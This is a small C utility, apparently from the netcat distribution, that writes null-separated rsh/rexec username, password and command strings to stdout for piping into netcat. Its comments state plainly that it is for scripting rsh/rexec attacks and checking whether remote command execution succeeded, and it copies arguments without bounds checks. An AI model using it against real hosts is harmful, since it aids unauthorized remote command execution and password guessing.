69 lines
1.2 KiB
C
69 lines
1.2 KiB
C
|
/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
|
||
|
rsh/rexec attacks. Needs to be a prog because shells strip out nulls.
|
||
|
|
||
|
args:
|
||
|
locuser remuser [cmd]
|
||
|
remuser passwd [cmd]
|
||
|
|
||
|
cmd defaults to "pwd".
|
||
|
|
||
|
... whatever. _H*/
|
||
|
|
||
|
#include <stdio.h>
|
||
|
|
||
|
/* change if you like; "id" is a good one for figuring out if you won too */
|
||
|
static char cmd[] = "pwd";
|
||
|
|
||
|
static char buf [256];
|
||
|
|
||
|
main(argc, argv)
|
||
|
int argc;
|
||
|
char * argv[];
|
||
|
{
|
||
|
register int x;
|
||
|
register int y;
|
||
|
char * p;
|
||
|
char * q;
|
||
|
|
||
|
p = buf;
|
||
|
memset (buf, 0, 256);
|
||
|
|
||
|
p++; /* first null */
|
||
|
y = 1;
|
||
|
|
||
|
if (! argv[1])
|
||
|
goto wrong;
|
||
|
x = strlen (argv[1]);
|
||
|
memcpy (p, argv[1], x); /* first arg plus another null */
|
||
|
x++;
|
||
|
p += x;
|
||
|
y += x;
|
||
|
|
||
|
if (! argv[2])
|
||
|
goto wrong;
|
||
|
x = strlen (argv[2]);
|
||
|
memcpy (p, argv[2], x); /* second arg plus null */
|
||
|
x++;
|
||
|
p += x;
|
||
|
y += x;
|
||
|
|
||
|
q = cmd;
|
||
|
if (argv[3])
|
||
|
q = argv[3];
|
||
|
x = strlen (q); /* not checked -- bfd */
|
||
|
memcpy (p, q, x); /* the command, plus final null */
|
||
|
x++;
|
||
|
p += x;
|
||
|
y += x;
|
||
|
|
||
|
memcpy (p, "\n", 1); /* and a newline, so it goes */
|
||
|
y++;
|
||
|
|
||
|
write (1, buf, y); /* zot! */
|
||
|
exit (0);
|
||
|
|
||
|
wrong:
|
||
|
fprintf (stderr, "wrong! needs 2 or more args.\n");
|
||
|
exit (1);
|
||
|
}
|